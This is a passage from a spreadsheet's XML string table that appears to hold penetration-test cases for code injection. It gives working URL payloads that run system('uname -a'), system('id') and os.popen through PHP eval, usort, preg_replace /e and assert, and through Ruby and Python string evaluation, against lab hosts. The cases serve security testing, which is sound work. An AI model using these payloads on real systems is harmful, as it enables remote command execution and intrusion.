        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Parse error:syntax error, unexpected '!', expecting ','or ';' in /var/www/index.php(16):
eval()'d code on line x
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">3. Then we  will get to know that it is a php code with eval() and  Now we  will balance the query by adding </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>"."  or ".."</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> at the end of the url.
If the code error displayed before disappears, then we have successfully balanced the query.
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">4. Now we can try executing system commands in the url.
 like : </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">".system("uname -a")."   OR   ".system("id")."
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> demo.libcurl.so?name=hacker".system("uname -a")." or hacker".system("id")."
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">If we are able to see system information like uname or id, then there is a code execution.
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">
User should not be able to see system information like uname or id.</t>
  </si>
  <si>
    <t>Code Execution when usort() function warning is being displayed with the error.</t>
  </si>
  <si>
    <t>Verify if user is able to execute system commands  when usort() function warning is being displayed with the error.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1.Open the firefox  browser and go to the website
2.Add  double codes " or forward slash  / or single code '  at the end of the url for eg. - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">http://ptl-bfadc90f-35407a7f.libcurl.st/?order=name" or http://ptl-bfadc90f-35407a7f.libcurl.st/?order=name/   or http://ptl-bfadc90f-35407a7f.libcurl.st/?order=name' </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> and if we get below error
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Parse error: syntax error, unexpected '"' in /var/www/index.php(29) : runtime-created function on line xx
Warning: usort() expects parameter 2 to be a valid callback, no array or string given in /var/www/index.php on line xxx
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">3. Then we  will get to know that it is a php code with usort() parameter warning and  Now we  will balance the query by adding     </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">  );}// </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">    at the end of the url.
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">http://ptl-bfadc90f-35407a7f.libcurl.st/?order=name);}//
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">If the code error displayed before disappears, and only warning is displayed then it is a good sign to proceed further with the payload and  we have successfully balanced the query.
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Warning: strcmp() expects exactly 2 parameters, 1 given in /var/www/index.php(29) : runtime-created function on line 1
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>4. Now we can try executing system commands in the url after providing second parameter.
 like :</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> order=name,1);}system('uname');//       OR         order=name,1);}system('id');//
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">http://ptl-bfadc90f-35407a7f.libcurl.st/?order=name,1);}system('uname');//      OR
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">http://ptl-bfadc90f-35407a7f.libcurl.st/?order=name,1);}system('id');//
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">If we are able to see system information like uname or id, then there is code execution.
</t>
    </r>
  </si>
  <si>
    <t>Code Execution by adding undefined constant</t>
  </si>
  <si>
    <t>Verify if user is able to execute system commands after adding undefined constant in the url.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1.Open the firefox  browser and go to the website
2..Add "e" in the middle of the url, if there is any "&amp;" add "e" before that -
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>for eg: http://ptl-062087b3-1bf76bc3.libcurl.st/?new=hacker&amp;pattern=/lamer/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>e</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">&amp;base=Hello%20lamer
 and if we get below error
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">"Notice: Use of undefined constant hacker - assumed 'hacker' in /var/www/index.php(14) : regexp code on line 1
Hello hacker"
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">3. Then we  will get to know that it is a php code and  we can  use php functions like </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>phpinfo()</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> or </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>system('uname -a')</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> in the url in place of hacker like below- 
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">When we use single code with the uname command we have to convert that with url encoding. So url encoded value of single code is </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">%27
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>http://ptl-062087b3-1bf76bc3.libcurl.st/?new=hacker&amp;pattern=/lamer/e&amp;base=Hello%20lamer
http://ptl-062087b3-1bf76bc3.libcurl.st/?new=</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>phpinfo()</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>&amp;pattern=/lamer/e&amp;base=Hello%20lamer
http://ptl-062087b3-1bf76bc3.libcurl.st/?new=</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>system(%27uname%20-a%27)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">&amp;pattern=/lamer/e&amp;base=Hello%20lamer
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">If we are able to see system information like uname or info, then there is code execution.
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">
User should not be able to see system information like uname or info.</t>
  </si>
  <si>
    <t>Code Execution when assert() function is being displayed in the error.</t>
  </si>
  <si>
    <t>Verify if user is able to execute system commands  when assert() function is being displayed in the error.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1.Open the firefox  browser and go to the website
2.Add  single code '  at the end of the url for eg. - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">http://ptl-d9b36e93-cc831688.libcurl.st/?name=hacker' </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> and if we get below error
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Parse error: syntax error, unexpected '';' (T_ENCAPSED_AND_WHITESPACE) in /var/www/index.php(15) : assert code on line 1
Catchable fatal error: assert(): Failure evaluating code: 'hacker'' in /var/www/index.php on line xx
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">3. Now we  will balance the query by adding </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">'.''.' </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">at the end of the url.
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">like : </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">http://ptl-d9b36e93-cc831688.libcurl.st/?name=hacker'.''.'
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">If the code error displayed before disappears, then we have successfully balanced the query.
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">4. Now we can try executing system commands in the url.
 like : </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">'.phpinfo().'    or    '.system('uname -a').'
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">for eg.
http://ptl-d9b36e93-cc831688.libcurl.st/?name=hacker'.phpinfo().'
http://ptl-d9b36e93-cc831688.libcurl.st/?name=hacker'.system('uname -a').'
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">If we are able to see system information like uname or iinfo, then there is a code execution.
</t>
    </r>
  </si>
  <si>
    <t>Code Execution on Ruby error.</t>
  </si>
  <si>
    <t>Verify if user is able to execute system commands  when he get's syntax Ruby error.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1.Open the firefox  browser and go to the website
2.Add  double codes "  at the end of the url for eg. - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">http://ptl-eb310357-a970eac5.libcurl.st/?username=hacker" </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> and if we get below Ruby error means error in  .rb 
for eg.
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">SyntaxError at /
(eval):1: unterminated string meets end of file
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">     </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">file: exercise.rb location: eval line: 13 
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">3. Then we will get to know its a Ruby code and  Now we  will balance the query by adding   </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">"%2b"test"%2b" </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">at the end of the url.
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">If the code error displayed before disappears, then we have successfully balanced the query.
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">4. Now we can try executing system commands in the url.
 like : </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">  "%2b`uname -a`%2b"
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">for eg. http://ptl-eb310357-a970eac5.libcurl.st/?username=hacker"%2b`uname -a`%2b"
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">If we are able to see system information like uname , then there is a code execution.
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Note: In Ruby we use </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> `</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">  to write the functions with in it.
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">
User should not be able to see system information like uname </t>
  </si>
  <si>
    <t>Code Execution using os.popen()</t>
  </si>
  <si>
    <t>Verify if user is able to execute system commands using os.popen()</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1.Open the firefox  browser and go to the website
2.Add  double codes "  or single code ' or forward slash / at the end of the url for eg. </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">-http://ptl-667eaf71-ef33507e.libcurl.st/hello/hacker" </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">and if we get any error like Internal server error- for eg
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">"Internal Server Error
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application."
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">
3. Then  we  will  try balancing the query by adding "." at the end  of the url and if error is gone then we can continue executing funtions with in that. If not we can try adding 
"+"  for eg. 
http://ptl-667eaf71-ef33507e.libcurl.st/hello/hacker"+"
If the code error displayed before disappears, then we have successfully balanced the query.</t>
  </si>
  <si>
    <t>4. Now we can provide some data in the fixed url and see how it is reflecting , so that we will get to know if this is in python  or ruby and based on that we can create our payloads.
 for eg. ptl-43192478-85f0785c.libcurl.st/hello/hacker"%2b"test"%2b" to concatinate (here %2b is url encoded value of + )
Note: we can not concatinate numbers directly.
If it is in ruby we use -&gt; 1.to_s  for concatination
eg. ptl-43192478-85f0785c.libcurl.st/hello/hacker"%2b1.to_s%2b"
In python we use str(1) for concatination of numbers.
for eg. http://ptl-43192478-85f0785c.libcurl.st/hello/hacker"%2bstr(1)%2b"</t>
  </si>
  <si>
    <t>5. Based on the displayed data on the page we can create our payload .We can try os.popen() function to retrieve the sensitive information of the system.
Like : (os.popen("uname -a").read())
http://ptl-43192478-85f0785c.libcurl.st/hello/hacker"%2bstr(os.popen("uname -a").read())%2b"
Note: Python os.popen() Method
Python method popen() opens a pipe to or from command.The return value is an open file object connected to the pipe,
 which can be read or written depending on whether mode is 'r' (default) or 'w'.The bufsize argument has the same meaning as in open() function.</t>
  </si>
  <si>
    <t xml:space="preserve">
User should not be able to see system information like uname .</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_18</t>
  </si>
  <si>
    <t>Iframe Injection</t>
  </si>
  <si>
    <t>Verify if Iframe embedded in a web application can be tampered</t>
  </si>
  <si>
